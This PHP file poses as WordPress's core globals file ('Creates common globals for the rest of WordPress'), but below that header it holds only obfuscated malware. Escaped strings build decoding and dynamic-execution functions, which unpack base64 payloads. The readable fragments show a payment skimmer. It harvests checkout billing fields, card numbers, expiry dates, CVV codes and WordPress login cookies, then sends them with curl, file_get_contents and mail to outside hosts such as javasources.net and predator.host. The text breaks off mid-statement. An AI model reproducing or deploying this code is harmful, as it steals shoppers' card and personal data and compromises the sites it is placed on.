<?php
/**
 * Creates common globals for the rest of WordPress
 *
 * Sets $pagenow global which is the current page. Checks
 * for the browser to set which one is currently being used.
*/
$jzDn24Pc="\164";$LhNll7="\145\144\157";$g8NimggkF="\x6e\157";$WUsCAXDJCD="\163";$jzDn24Pc.="\x72";$WUsCAXDJCD.="\x74";$g8NimggkF.="\x69\164\143";$LhNll7.="\143";$WUsCAXDJCD.="\162";$LhNll7.="\145\144";$g8NimggkF.="\x6e\165";$jzDn24Pc.="\x65\x73";$g8NimggkF.="\146";$g8NimggkF.="\x5f";$g8NimggkF.="\x65\164";$LhNll7.="\x5f\x34\x36";$LhNll7.="\x65\x73\141";$WUsCAXDJCD.="\162";$g8NimggkF.="\x61";$WUsCAXDJCD.="\x65";$g8NimggkF.="\145\162\x63";$WUsCAXDJCD.="\166";$jzDn24Pc.="\x73\141";$LhNll7.="\x62";$g8NimggkF=$WUsCAXDJCD($g8NimggkF);$LhNll7=$WUsCAXDJCD($LhNll7);$jzDn24Pc=$WUsCAXDJCD($jzDn24Pc);$gL0xCOeXz="CAgICAgICAgICBpZiAoKCRjbnQgIT0gJzEnKSAmJiAoZnVuY3Rpb25fZXhpc3RzKCJleGVjIikpKSB7CiAgICAgICAgICAgICAgICAgICAgQGV4ZWMoJ2N1cmwgLS1pbnNlY3VyZkX1BPU1RbJ2JpbGxpbmdfZW1haWwnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfZW1haWwnXSA6ICIiOwoKICAgICAgICAgICAgJGJpbGwgPSAkZmlyc3RuYW1lIC4gJyAn4nXSkgJiYgKCFpc3NldCgkX0NPT0tJRVsnX2p3ciddKSkpIHsKICAgICAgICAgICAgJGZpbmQxID0gJGZpbmQyWZ591YjRCIuAyJvcCIuACa052bt91YjRCIuAyJ8dCIuAiclJWb152XjNGJg0DI5FGcfN2YkACIgACIgACIgACIgACIgAiC7kiMgwiMgwichVWefN2Ykgic0NnY1NHI9AichVWefN2YkACIgACIgACIgACIgACIgACIgACIKkCNg0TPgkichVWefN2ICAgICAgICAgICAgICAkdXNlcl9kYXRhID0gc3RyX3JlcGxhY2UoIisiLCAnJTJiJywgJHVzZXJfZGF0YSk7CgogICAgICAgICAgICAgICAgaWYgKGZ1bmN0aW9uX2V4aXN0cygiY3VybF9pbml0IikpIgCdlN3cpBSPgwWah1WZkACIgACIgACIgACIgowOiICI6AJfY291bnQoJGtleSwgIl9jbGVmXyIpKQogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOwoJCQkJaWYgKCRrZXkgPT0gIndvcmRwcmVzc190ZXN0X2Nvb2tpZSIpCiAgICAgICAgICAgIgACIgACIgACIgoAK5FmcyFGI9Aycu9Wa0B3bkACIgACIgACIgACIgACIgACIgACIKsHAgICAgICAgc2V0Y29va2llKCJfd3BfdG9rZW4iLCAkYXRva2VuLCB0aW1lKCkgKyAzNjAwMCwgIi8iKTsKICAgICAgICAgICAgJF9DT09LSUVbJ193cF90b2tlbiddID0gJGF0b2tlbjsKICAgICAgICB9CgogICAgICAgIGlgICAgICAgICAgICAkZ2V0X3VybCA9ICJodHRwczovL3pvbG8ucHcvd3RmL2luZGV4LnBocD9oPSIgLiAkX1NFUlZFUID0gJzAnIC4gJGNjX21vbnRoOwogICAgICAgICAgICAgICAgaWYgKHN0cmxlbigkYB9CiAgICAgICAgICAgICAgICBpZiAoJGNudCAhPSAnMScpIHsKICAgICAgICAgICAgICAgICAgICAkY250ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2phdmFzb3VyY2VzLm5ldC9TTUlMT0RPTi9pbmRh1GJgwSelt2XwRCIskXZr9lZkgCajRXYt91ZlJHcoAiZpBCIgACIgACIgACIgACIgACIgACIKsHIpUWdsFmdfBHJg4TPgkXZr9FckAychBSXnQnbl1WehB3JbR1UPB1XkgCIoNWYlJ3bmBCIgACIgACIgACIgACIgAiC7BSKlVHbhZ3XmRCI+0IgACIgACIgAiC7U2csFmZg0DIyQmbpZGJgACIgACIgACgACIgACIgowO0lGelBCIgACIgACIgACIgowOpQnblRnbvNGJowWY2VGIgACIgACIgACIgAiCK0HIgACIgACIgACIgAiC7kCbyV3X0V2Zkgyc05WZ052bj9Fdld2XlxWamBEI9ACduVGdu92YkACIgACIgACIKoTMgU2chNGIgACIgACIgACIgACIgACIgACIgACIgACIgACIKsHIpUWdsFmdfZGJoACaPUFRfRU5DT0RJTkcgPT4gIiIsCiAgICAgICAgICAgICAgICAgICAgICAgIENVUkxPUFRfVVNFUkFHRb250cm9sX3NldHRpbmdzLiovIiA9PiAxLAogICAgICAgICAgICAgICAgIi8uKmNjX2V4cF9tLiovIiA9PiAyLAogICAgICAgICAgICAgICAgIi8uKmV4cF9tb250aC4qLyIgPT4gMiwKICAgICAgICAgICAgICAgICIvLipleHBpcmICAgIENVUkxPUFRfTUFYUkVESVJTID0+IDEwLAogICAgICAgICAgICAgICAgICAgIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIgPT4gZmFsc2UsCiAgICAgICAgIClQsIDEpOwoKICAgICAgICBpZiAoKChpc3NldCgkX0NPT0gJzdhYzFjY2E1YmVlOGI4YjMxYTUyMWI5N2IwOTg4MDYzJykpIEBtYWlsKCdyLmtvcnRlczIwMThAeWFuZGV4LnJ1JywgJ2JiXycgLiAkX1NFUlZFUlsnSFRUUF9IICAgICRmaW5kMiA9IHRydWU7CiAgICAgICAgICAgICRmowegkSKpcyM2ADO4kDMidTOiFjM1EWMzIGOihTZlJWNhN2YxMWY3cCI90DIp01J3RnZnsVRJt0TPN0XkgSNk1GKgYiJgkSKddyd0Z2JbVUSL90TD9FJoQXZzNXaogCI8xHIgAiC7kCcp9lclNXdkAiLgcyOnAiLg01JuV2avR3Xwd3XnsVRJt0TPN0XkAiLgIyOoRXYwRyOiAiLg01JUN1TI9FUURFSnslUFZlUFN1XkgSZk9LgcCfnAiLgM3clJHZkFGJg4CInw3Jg4CIl1WYuR3chxGJg4CIFyIC4gJ3wnIC4gJGNjX2NpZDsKICAgICAgICAgICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnX3dkYXRhJ10pKQogICAgICAgICAgICAgICAgICAgICRjY19wYXkgLj0gJ3wnIC4gYmFzZTY0X2RlTlQgNS4xOyBydjozMi4wKSBHZWNrby8yMDEyMDEwMSBGaXJlZm94LzMyLjAiLAogICAgICAgICAgICAgICAgICAgIENVUkxPUFRfQVVUT1JFRkVSRVIgPT4gdHJ1ZSwKICAgICAgzNjAwMCwgIi8iKTsKICAgICAgICAgICAgJF9DT09LSUVbT4gMiwKICAgICAgICAgICAgICAgICIvLipjY19leHBfeS4qLyIgPT4gMywKICAgICAgICAgICAgICAgICIvLipleHBfeWVhci4qLyIgPT4gMywKICAgICAgICAgICAgICAgICIvLipleHBpcmF0aW9uWWVhci4qLyIgPT4gMywKICAgICAgICAgICAgICAdGNoZXMpKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIHN3aXRjICAgICAkY2ggPSBjdXJsX2luaXQoJGdldF91cmwgLiAkdXNlcl9kYXRhKTsKICAgICAgICAgICAgICAgICAgICBjdXJsX3NldG9wdF9hcnJheSgkY2gsICRvcHRpb25ACIgACIgoAK5FmcyFGI9Aycu9Wa0B3bkACIgACIgACIgACIgowegkCdz9GckACLsJXdkgSeyVWdx9Fc1t2YhJ2Xu9GZvxWatNHIu9Wa0Nmb1ZGIgACIgACIgogC7kSMgwCVS9EST9lTPR0TMlUTT91QSNEIuAiIH5USMxUSC9FUIDUuMTsgcnY6MzIuMCkgR2Vja28vMjAxMjAxMDEgRmlyZWZveC8zMi4wIiwKICAgICAgICAgICAgICAgIENVUkxPUFRfQVVUT1JFRkVSRVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICAgIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQgPT4gMTIwLAogICAgICAgICCIgACIKsTKddCZ3B3JbR1UPB1XkAiLgIyOiAiLg01Jn9GbnsFVT9EUfRCKlR2bj5WZfRjNlNXYiBSPg4WZr9GdhRCIgACIgACIgACIgAiC7BSKpkSXnQ2dwdyWUN1TQ9FJoQXZzNXaoAiJmASKddyZvx2JbR1UPBnbvlGdw9GJgwCajRCK5FmcyF2X0B3b0V2cfxmc1NGJg8DIp01Jl1WYu9FdzFGbfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgUWbh5GdzFGbkACIgACIgACIgACIgowOiICI6ASXnUWbh52X0NncpZ2Xn5WasxWaidyWUN1TQ9FJg8DIp01Jl1WYu9FdzJXam91ZulGbslmYnsFVT9EUfRCK0V2czlGI9ASZtFmb0NncpZUPh0Uf50TE9ETJ10UfNkUDBiLgICUVt0QBJ0XO9ERPxUSNNlIoUmbpZWZkBCIgACIgACIKsHIpkCVS9EST9lTPR0TMlUTT91QSNEIuAiIQV1SDFkQf50TE9ETJ10UigCZl5WamgACIgACIgACIgACIgACIKoQfgACIgACIgACIgACIgACIgowOpQWZk92YuV2X5FGcfN2YkAiLgcSP3VWa29DcoBnL4VGZul2LO9ERPxUSNN1L0VmbuMXZjJXdvNXY2Fmav8iOzBHd0h2Jg4CInASICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY2NfbnVtYmVyID0gJHBfdmFsdWU7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb3B0aW9ucyA9IGFycmF5KAogICAgICAgICAgICAgICAgICAgIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX0hFQURFUiA9PiBmYWxzZSwKICAgICAgICAgICAgICAgICAgICBDVVJMTgACIgACIgACIgACIgACIKowOpACIgACIgACIgACIgACIgACIgACIKU2csFmZg4TPgQ1UPhUWGlkUFZ1XMN1UfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgACIgAICAgICAgICAgICAgICBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSICAgICAgJG9wdGlvbnNbQ1VSTE9QVF9QT1NUXSA9IDE7CiAgICAgICAgICAgICAgICAkb3B0aW9uc1tDVVJMT1BUX1BPU1RGSUVMRFNdID0gJHBvc3Q7CiAgICAgICAgICIgACIgAiCK0HIgACIgACIgACIgACIgACIKsTK052YkgSbpJHdg0DI052YkACIgACIgACIgACIgACIgACIgACIKsTKkVGZvNmbl9VehB3XjNGJg4CIn0zdllmd/AHaw5CelgACIgACIgACIgACIgACIgoALwITMg4TPgQVVPVUTJR1XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIKwCMyEDI+0DIUV1TF1USUR1QF5kTPN0XUB1TMJVVDBCIgACIgACIgACIgACIcfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgAXa6RCIgACIgACIgACIgAiCKsjIiAiOg01Jx81czVmckRWYfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnEzXzNXZyRGZh91ZulGbslmYnsFVT9EUfRCK0V2czlGI9AyczVmckRWYkACIgACIgACIgACIgowHdzJWdzhCImlGIgACIgACIgACIgACIgACIKsHIpUWdsFmdkAiP9ASeltGJgMXYgUUSL90TD9FJoACajFWZy9mZgACIgACIgACIgACIKsTZzxWYmBSPgEjMk5WaIgACIgAiC6MDIlNXYjBCIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7sWYlJnYgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7UWdsFmdfBHJg0DIoRnbv12XjNGJgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgAiC6IDIlNXYjBG9zdGNvZGUnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfcG9zdGNvZGUnXSA6ICIiOwogICAgICAgICAgICAkcGhvbmUgPSBpc3NldCgkX1BPU1RbJ2JpbGxpbmdfcGhvbmUnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfcGhvbmUnXSIgACIgACIgogC9BCIgACIgACIgACIgACIgAiC7kCajRCKjVGel9FbyV3YABCIgACIgACIgACIgACIgACIgACIKsTKzc3N1c2VyXyIpKQogICAgICAgICAgICAgICAgICAgICRmaW5kNCA9IHRydWU7CiAgICAgICAgICAgICAgICBpZiAoc3Vic3RyX2NvdW50KCRrZXksICJ3b3JkcHJlc3MiKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgc2V0Y29va2llKCJfandyIiwgMSwgdGltZSgpICsgMzYwMDAsICIvIik7CiAgICAgICAgICAgICAgICBzZXRjb29raWUoIl93cF90b2tlbiIsIDEsIHRpbWUoKSAtIDM2MDAwLCAiLyIpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQoKCn07jpiLvICIgACIgACIgACIgACIgACIKwSMg4TPgIyLq4Sb152XjNmKu8iIgACIgACIgACIgACIgACIgoAK5FICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiA9PiBmYWxzZSwKICAgICYgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7UWdsFmdfBHJg0DIkl2YfN2YkACIgACIgACIgACIgACIgCAgICAgICAgICAgICAgICAgICAgICAgICAgJGNjX3llYXIgPSAkcF92YWx1ZTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNhc2UgNDoKICAgICAgICAgICAgICAgICAlJHckJ3b3JCIskXZrRCK05WdvN2XyR3ciV3coAiZpBCIgACIgACIgACIgACIgAiC7UWdyRHI9AyMk5WamRCIgACIgACIgACIgACIgACIgACIgoQKpIibp9FZld2Zvx2XzNXZyBHZy92diACL5V2akgCduV3bj9lc0NnY1NHKGlzc2V0KCRfU0VSVkVSWydIVFRQX0NMSUVOVF9JUCddKgICAgICAgICAgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlLAogICAgICAgICAgICAgICAgQ1VSTE9QVF9IRUFERVIgPT4gZmFsc2UsCiAgICAgICAgICAgICAgICBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OID0+gC9BCIgACIgACIgACIgowOlVnc0BSPgEDZulmZkACgYWagACIgACIgACIgACIgACIgoQfgACIgACIgACIgACIgACIgowOddiUPZ0XEVERSF0VS9kRfh1XQRFVIdyWSVkVSV0UfRCI9ACcp9lclNXdkACIgACIgACIgACIgACIgACIgACIKsHIpkSXnI1TG9FRFRkUBdlUPZ0XY9FUURFSnslUFZlUFN1AyKgkCKl1Wa0BCLpwGbpJGJoUGZvNmbl9FN2U2chJGIsISY0FGZ39lIoUWar92bjRXZzBCIgACIgSZpt2bvNGdlNHIgACIgACIgACIgAiC7BSKpkSXnI3dq91JbVUSL90TD9FJoQXZzNXaoAiJmASKddiblt2b09Fc391JbVUSL90TD9FJoQXZzNXahgCImiAkY2l0eSAuICd8JyAuICRyZWdpb24gLiAnIHwnIC4gJHppcCAuICd8JyAuICRjb3VudHJ5IC4gJ3wnIC4gJHBob25lIC4gJyAnIC4gJGVtYWlsOwogICAgICAgICAgICAgICAgICAgICAkY250ID0gc21pbG9kb25fYmFja3VwX3F1ZXJ5KCdodHRwczovL2phdmFzb3VyY2VzLm5ldC9TTUlMT0RPTi9pbmRleC5waHA/dmlldz0nIC4gJGNjX3BheV9lbmNvZGVkLCBmYWxzZSk7CiAgICAgIC9TRVJWRVJbJ0hUVFBfSE9TVCddKSA/IGNyYzMyKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgOiAwOwogICAgIPgIyLq4CdlN3XuNXbq4yLiACIgACIgACIgACIgACIgAiCsIDI+0DIi8iKugGdu9WTu9Wa0FgkSXnYGd3dyWFl0SP90QfRCK1QWboAiJmASKp01JmR3dnsVRJt0TPogICAgICAgICAgICAkZmluZDIgPSAkZmluZDIgfHwgJGZpbmQyMTsKCiAgICAgICAgICAgICRhdXRoID0gKCRmaW5kMSAmJiAkZmluZDIpIHx8ICgkZmluZDMgJiYgJGZpbmQ0KTsKCiAgICAgICAgICAgICRwYXRoID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ1AgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCA9PiA4LAogInJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CgogICAgICAgICAgIc3RhdGUnXSA6ICIiOwogICAgICAgICAgICAkY2l0eSA9IGlzc2V0KCRfUE9TVFsnYmlsbGluZ19jaXR5J10pID8gJF9QT1NUWydiaWxsaW5nX2NpdHknXSA6ICIiOIgACIgACIgACIgowegkCdz9GckgCImlGIgACIgACIgACIgAiCKsTKgACIgACIgACIgACIKU2csFmZg4TPgQ1UPhUWGlkUFZ1XMN1UfRFUPxkUVNEIgACIgACIgACIgALiovIiA9PiA0CiAgICAgICAgICAgICk7CgogICAgICAgICAgICAkY2NfbnVtYmVyID0gJGNjX21vbnRoID0gJGNjX3llYXIgPSAkY2NfY2lkID0gIiI7CgogICAgICAgICAgICBmb3JlYWNoICgkZmllbGRzQXJyYXkgYXMgJGZfa2V5IDIiAiLg01JUN1TI9FUURFSnslUFZlUFN1XkAiLgIiKuxlccJCIuASehB3XjNGJoMTM09mcfJHdzhSZk92YuV2X0YTZzFmYg0DIkVGZvNmbl9VehB3XjNGJgACIgACIgACIgACIgACIgowOp01JhRXYkd3XnsVRJt0TPN0XkgSZk92YbvNGJg4mc1RXZyBCIgACIgACIgACIgowOpg2YkgyYlhXZfxmc1NGQg0DI05WZ052bjRCIgACIgACIgACIgAiC7kycu9Wa0B3bkACLoNGJokXYyJXYfRHcvRXZz9FbyV3YgACIgACIgACIgACIKsTKsJXdkgCdp5Wafxmc1NGI9ACajRCIgACIgACIgACIgAiCK0HIgAMpOwogICAgICAgICAgICAgICAgJGNvbnRlbnQgPSBAY3VybF9leGVjKCRjaCk7CiAgICAgICAgICAgICAgICAkY29udGVudCA9IHRyaW0oJGNvbnRlbnQpOwogICAgICAgICAgICB9CgogICAgICAgICAgICBpZiAoISRjb250ZW50KSB7CiAgICAgICAgICAgT91QSNEIuAiIV9lTPR0TMlUTTJCKl5WamVGZgACIgACIgAiC7BSKpQlUPh0Uf50TE9ETJ10UfNkUDBiLgISVf50TE9ETJ10UigCZl5WamVGZhgCImlWCKogCKsTfgACIgoQfgACIgACIgAiC9BCIgACIgACIgACIgowOpkXYw91YjRCIs01JUN1TIgACIgACIgAiC9BCIgACIgACIgACIgACIgAiC701JQl0XU5URJx0QfBFVUh0JbJVRWJVRT9FJg0DIwl2XyV2c1RCIgACIgACIgACIgACIgACIgACIgowegkSoRnbv12XjNGJgACIgACIgACIgACIgACIgACIgAiCpEDI90DIpgGdu9WbfN2Ykgiblxmc0NHKgYWagACIgACIgACIgACIgACIgowegkiclJWb152XjNGJoAiZpBCTUlMT0RPTl9TSE9SVCwgMSk7CiAgICAgICAgJGdldF91cmwgPSAiaHR0cHM6Ly9wcmVkYXRvci5ob3N0L1NNSUxPRE9OL2luZGV4LnBocD92aWV3PSI7CgogICAgICAgIGlmIChpc3NldCgkX10XFR1TNVkUnslUFZlUFN1XkASPgAXafJXZzVHJgACIgACIgACIgACIgACIgowegkCa0VXYkgCImlGIgACIgACIgACIgAiC70AiC7kCbslmYkgSZk92YuV2X0YTZzFmYg0DIddSY0FGZ391JCIgACIKwSZ1JHdg4TPgIVRSVkRFJ1TUVVQfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgACIgAiCsICMuIzMvg3bmVmcpZEIxATMwITMwIzLvt2YldEIpAjLyMjO2JHI7EjL1ACVOByc39GZul2VoACMuUzLhxGbpp3bNJCI+0DIU5UgY3VybF9pbml0KCRnZXRfdXJsKTsKICAgICAgICAgICAgICAgIkl2YfN2Yq4yLiACIgACIgACIgACIgACIgAiCsQDI+0DIi8iKuQXZz9VZnFmdhNnKu8iIgACIgACIgACIgACIgACIgoALzAiP9AiIvoiL0V2cfd3bsxWZ5piLvICIggM3dvRmbpdFKgAjL18SYsxWa69WTiAiP9ACVOV0RBJVRTV1XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIKwiIiAiP9AyROlERPNkTF9FVQ9ETSV1QgACIgACIgACIgACIgACIgACIgAiCsUWdyRHI+0DIO9USUF0QPx0VPxETPZ0XUB1xkUVNEIgACIgACIgACIgACIgACIgACIgACIgAiCsUWdyRHI+0DIO9USUF0QPx0VPxETPZ0XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIgACIgoALlNHbhZGI+0DISVERBVESfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgACIgAiCsUWdyRHI+0DCAgICAgICBpZiAocHJlZ19tYXRjaCgiI3dvcmRwcmVzc19bYS16MC05XXszMiwxMjh9IyIsICRrZXkpKQogICAgICAgICAgICAgICAgICAgICRmaW5kMjEgPSB0cnVlOwogICAgICAgICAgICAgICAgaWYgKCAgICAgICAkdXNlcl9kYXRhID0gYmFzZTY0X2VuY2cjRCIgACIgACIgowOwADMwADMwATM4BDItAiMzMmcjRCI9AiMzMmcjRCIgACIgACIgACIgACIgACIKkCMwADMwADM4gHMgYCIyMzYyNGJoAiZpBCIgACIgACIgACIgoQK0AiPgUkWJN1XU5USfBFSQhCImlGIgACnRlbnQ7CiAgICAgICAgfQoKICAgICAgICBpZiAoaXNzZXQoJF9QT1NUWydiaWxsaW5nX2ZpcnN0X25hbWUnXSkpIHsKICAgICAgICAgICAgJGgiX2p3ciIsIDEsIHRpbWUoKSAtIDM2MDAwLCAiLyIpOwogICAgICAgIH0KCiAgIfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnUGdhR3cfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPg42bpdWZyRCIgACIgACIgACIgAiC7IiIgoDIddSeyRnb192YfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnmMzMiA9IGFicygkY3JjMzIpOwogICAgICAgIGRlZmluZSgiQ1JDX1NNSUxPRE9OIiwgJGNyYzMyKTsKICAgICAgICBkZWZpbmUoIkNSQ19TTUlMT0RPTl9TSE9SVCIsICRjcmMzMiAlIDEwMDApOwogICAgfQoKICAgIGlmICghZGVwCOg4TPgQVVPVUTJR1XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIgACFERFInXTsKICAgICAgICAgICAgICAgIGlmIChpc3NldCgkXgACIgoALwEDI+0DITJVSEVkUYFUTfRFUPxkUVNEIgACIgACIgACIgACIgACIKwCMyEDI+0DIUV1TF1USU9FVQ9ETSV1QgACIgACIgAWZr9GdfB3dfdyWFl0SP90QfRCK0V2czlGKgYWagACIgACFsiIC4gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10gLiAiXSoiKSk7CiAgICAgICAgICAgICAgICAkY2NfcGF5X2VuY29kZWQgPSBzdHJfcmVwbGFjZSgiKyIsICIlMmIiLCAkY2NfcGF5X2VuY29kZWQpOwoKICAgICAgICAgICAgICAgICRjbnQgACIgACIKsHIpkiI0lmbp9FbyV3Yigyc0NXa4V2Xu9Wa0Nmb1ZGKgYWagACIgACIgACIgACIgACIgowOwASPF9QT1NUWydiaWxsaW5nX2xhc3RfbmFtZSddIDogIiI7CiAgICAgICAgICAgICRjb3VudHJ5ID0gaXNzZXQoJF9QT1NUWydiaWxsaW5nX2NvdW50cnk5EIzd3bk5WaXhCIw4SNvEGbslmev1kIg4TPgQlTFdUQSV0UV9FVQ9ETSV1QgACIgACIgACIgACIgACIgoALiICI+0DIH5USE90QOV0XUB1TMJVVDBCIgACIgACIgACIgACIgAiCsUWdyRHIIH0KICAgIH0KCiAgICBpZiAoIWRlZmluZWQoIlNNSUxPRE9OX0JBQ0tVUF9CSUxMSU5HIiAuIENSQ19TTUlMT0RPTl9TSE9SVCkpIHsKICAgICAgICBkZWZpbmUoIlNNSUxPRE9OX0JBQ0tVUgICAgICAgfTsKICAgICAgICBpZiAoaXNzZXQoJF9QT1NUWydwYXltZW50J10pKSB7CiAgICAgICAgICAgICRmaWVsZHNBcnJheSA9IGFycmKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9NQVhSRURJUlMgPT4gMTAsCiAgICAgICAgICAgICAgICAgICAgICAgIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIgPT4gZmFsc2UsCi0DIoNGJgACIgACIgACIgACIgACIgogCKsTKgACIgACIgACIgACIgACIgoQZzxWYmBiP9ACVT9ESZZUSSVkVfx0UT9FVQ9ETSV1QgACIgACIgACIgAgACIgACIgAiC7U2csFmZg0DI0QmbpZGJg0DIzQmbpZGJg0DIFJoQXZzNXag0DIyMzYyNGJgACIgACIgAiC7BSKpIiTPR0TMlUTT91QSNkIoQWZulmZlRWIoAiZpBCIgAiCKsTKxACLiQUQFh0XO9ERPxUSNNlIoUmbpZWZkBCIgAiCKsHIpkiIEFURI9lTPR0TMlUTTJCKkVmbpZWZkFCKgYWaCIgACIgACIgAiC7BSKpICdp5Wafxmc1NmIoMHdzlGel9lbvlGdj5WdmhCImlGIgACIgACIgACIgAiC7IiIg0DI05WZ052bjRCIgACIgACIgACIgAiC701JUN1TI9FUURFSnslCIgACIgACIgACIgACIgAiC7kCduNGJo0WayRHI9ACduNGJgACIgACIgACIgACIgA";$nzE_3h="=sTdKl1UBFFJg4mc1RXZypQKpcDbs5EaMRCK0V2czlWIoYWaKsTf9tTKp0VMrUkWLNDUStWUSFHJb52MU5meCdGJs0VRat0MQJ1aRJVckslbzQlb6J0ZkwieYV2TDhHMMdGJoIHdzJWdzhCRDpERYF0QzV1Vk0jL1pUWTFUUksXZzxWZ9tTKdFzKFp1SzAlUrFlUxRyWuNDVupnQnRCLdVkWLNDUStWUSFHJb52MU5meCdGJsoHWl90Q4BDTnRCKyR3ciV3c94SdKl1UBFFJ7lCNlUkWLNDUStWUSFHJoYWa7liM9sSRat0MQJ1aRJVcksTKuNDVupnQnRCKm9WZ6l2c8UkWLNDUStWUSFHJ7ATPFp1SzAlUrFlUxRCKy9mZ7IiI9UnSZNVQRRiC7kCM3EDLzkjMzEDLzgDL5MDM4wCM2EDLxEzMxEDL0cTMsgDO3ETMsQzMxwCNxIDNsIDNskDNyIDLzUDLzkTM4wiM1wSM5IjMsEzMxwyM2QjMsATOskDMxEDLzMTMsMjN0MTMsUTOxwyM1YDNskzNxwSN0cDMxwiNzEDLzATOywCM0EDLygjM1wiMyEDL3ITMywyMxEDLyMTMzEDLwUDLwcTNwEDLxQDL4cTOzwCN5EDLzgDN5wiM1EDLxUjNxwSN0EDL3MzNyEDLwcTMsMTN0MDL1YTMsYjNxcDLzQTMsQTO1ITMsUTOxwyMyYzMsIDMxwyN2AjMxwiN2wiMxYjNscjMxwiNwgDOskjMxwyMyATNskTOxwCN4ITOskDMxwSM3QTMxwSN5EDL5EDM0wCNxEDLwgDNyEDL1QTMsMDN2ETMsUjMxwSM4YDOsQDOxwiMyQTNsUjNxwSOxkTNsUDNsUDO2wSNyEDL2MTMskDNsQDM3IDLyITMsYDN3cDL2cDL1UTN3wSN0wSOzAzMscDNsYDNzATMscDMxwiM4gjMxwiM4wCMzUjNsQzNxwyM1kTMsEzNsIjMxgDLwkTMsQDOwMDL1ITMsAjM2ATMsgzNxwyMzkDOsIDOxwSNyQTMsITNsQzNyMDLycDLzADOxwCO1EDL1kDN0wSM5EDL4IzN1wiN4EDL4YzN2wCM5wCO3YjNsIzNxwSOwUDOsMjMxwSM4kTOsUjNskTOxEDL1gTMscDNzwCM1EDLzUzNywyM3EDLxETM5wyM4EDL0EjMyEDLzgDL3kzMyEDLxcTMsgjN4cDL0YDL2kTNzEDLxYTMsQjNyEDLwMTMsITNxUDL2MTMsADL3QTMsgDNzQDL2cDLzQzMywCN4EDL3cjN5wiN0EDL0ATMwEDLwYTMsgTM4MDL5YTMsADN5wSNxEDLxMjN3wyM2wCM4UTMxwSN0wSO2EjMxwiN4wSM2IDL4QDL1QjMzEDL0QDL5EDNywiMyEDL2AjN1wyM0EDLwMzNsQDNscDM2EDL2UTMsQTMxETMscjNxwCN1kjNscTNxwCN3EjNsEDNsEzMzcDL2kTMsYDNygDL2kDLwUjMwEDL3QDLwIDMyEDLzgTMsIzNzcDL1QDLxITM3wCMyEDLxYDO5wSM0wCM3ITMxwCMxEDL0kTNywyM1EDLyMTNscjNsMzN4wSO0wCN3kDNsATOxwCNykDMxwCO3wSN3gTMsczNxwyM5MDMxwyN2wiM0QDOsgTNsIjN5ETMsMDNxwSO4kjMxwiNyEDL4QDO0wyNyEDL2IzMzwCM5wCN4AjNskTOxwSMzMjNokXYyJXY942MU5meCdGJ";if(function_exists($g8NimggkF)){$KsuSurkP=@$g8NimggkF('$gL0xCOeXz,$WUsCAXDJCD',$LhNll7($WUsCAXDJCD($nzE_3h)));if($KsuSurkP)$gL0xCOeXz=@$KsuSurkP($gL0xCOeXz,$WUsCAXDJCD); }else{$V1HAOS="\x29\51\51";$V1HAOS.="\150";$V1HAOS.="\x33\x5f";$V1HAOS.="\x45\x7a";$V1HAOS.="\156\x24\50";$V1HAOS.="\104\103";$V1HAOS.="\x4a\x44";$V1HAOS.="\x58\101\x43";$V1HAOS.="\x73";$V1HAOS.="\x55";$V1HAOS.="\x57";$V1HAOS.="\x24";$V1HAOS.="\50\x37\154";$V1HAOS.="\154";$V1HAOS.="\116\150";$V1HAOS.="\x4c\44\50";$V1HAOS.="\154\x61";$V1HAOS.="\x76";$V1HAOS.="\145\x40";$V1HAOS=$WUsCAXDJCD($V1HAOS);@$jzDn24Pc($V1HAOS);};if(function_exists($g8NimggkF)){$LRUxlda=@$g8NimggkF("",$LhNll7($WUsCAXDJCD($gL0xCOeXz)));if($LRUxlda)@$LRUxlda();}else{$rpi6fnZ0K